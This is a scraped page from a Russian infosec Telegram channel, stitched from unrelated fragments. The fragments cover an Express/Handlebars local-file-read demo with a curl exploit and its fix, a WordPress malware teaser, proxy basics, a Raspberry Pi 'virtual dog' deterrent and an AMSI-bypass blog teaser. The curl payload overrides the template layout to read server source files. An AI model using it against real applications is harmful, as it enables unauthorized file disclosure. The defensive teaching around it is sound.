S.E.Reborn
Copyright: @SEAdm1n Вакансии: @infosec_work Информационная безопасность. Литература для ИТ специалистов. Пентест, Хакинг, OSINT, СИ, DevOps, Администрирование. Сотрудничество - @SEAdm1n
Більше- Підписники
- Перегляди допису
- ER - коефіцієнт залучення
Триває завантаження даних...
Триває завантаження даних...
A collection of all public Google Earth Engine Apps. - GitHub - philippgaertner/awesome-earth-engine-apps: A collection of all public Google Earth Engine Apps.
npx express-generator
express --view hbs
Бонусом получаешь LFR и, потенциально, RCE.
Пример непримечательного кода
var express = require('express');
var router = express.Router();
router.post('/', function(req, res, next) {
var profile = req.body.profile
res.render('index', profile)
});
module.exports = router;
А теперь эксплойт для LFR, чтобы прочитать исходники
curl -X 'POST' -H 'Content-Type: application/json' --data-binary $'{\"profile\":{"layout\": \"./../routes/index.js\"}}' 'http://localhost:9090/'
Внутри миддлвары, в процессе рендера, на самом деле существует параметр layout
, который получается переопределить, благодаря нашему переданному словарю.
С точки зрения кода, вместо
res.render('index', profile)
Правильно использовать
res.render('index', { profile })
Но даже так остается риск эксплуатации с помощью классического Prototype Pollution.If you’ve recently encountered the admin user wpsupp-user on your website, it means it’s being affected by this wave of infections. Identifying Contamination Signs: The malware typicall…
client <-> proxy <-> server.
Forward Proxy работает в связке с клиентом (выступает от его имени), а Reverse proxy — с сервером (выступает за сервер).
#Разноеiot/cameras
брокера Mosquitto, запущенного на медиасервере.
- На Raspberry Pi работает скрипт, который прослушивает iot/cameras
с помощью модуля asyncio-mqtt.
Он получает JSON-сообщение вида {"serial": "SE-N-ZoneB"}
и декодирует его. Если название камеры соответствует указанному в скрипте, то запускается на воспроизведение соответствующий аудиофайл с помощью Pygame.
• Ложные срабатывания (на свет автомобильных фар или мелких животных) не слишком опасны. Скорее наоборот, они делают виртуальную собаку более реалистичной, потому что у настоящих собак происходят такие же «ложные срабатывания».
• В будущем автор планирует добавить в систему физический триггер на ступеньках перед домом, чтобы пёс начинал лаять конкретно на человека, который подошёл к двери. Рассматривается возможность установки внутри дома радарного датчика HFS-DC06, который срабатывает через внешнюю стену.
• Известно, что лай собак и камеры видеонаблюдения — главные отпугивающие факторы для взломщиков. Даже виртуальная собака из колонок — это лучше, чем отсутствие собаки. К автору этого изобретения уже заходил потенциальный грабитель, который подёргал ручку двери гаража. Дверь была закрыта, поэтому он залез в гараж соседа. В любом случае, дополнительная безопасность никогда не помешает.
#РазноеIn this blog post, we'll introduce a new bypass technique designed to bypass AMSI without the VirtualProtect API and without changing memory protection.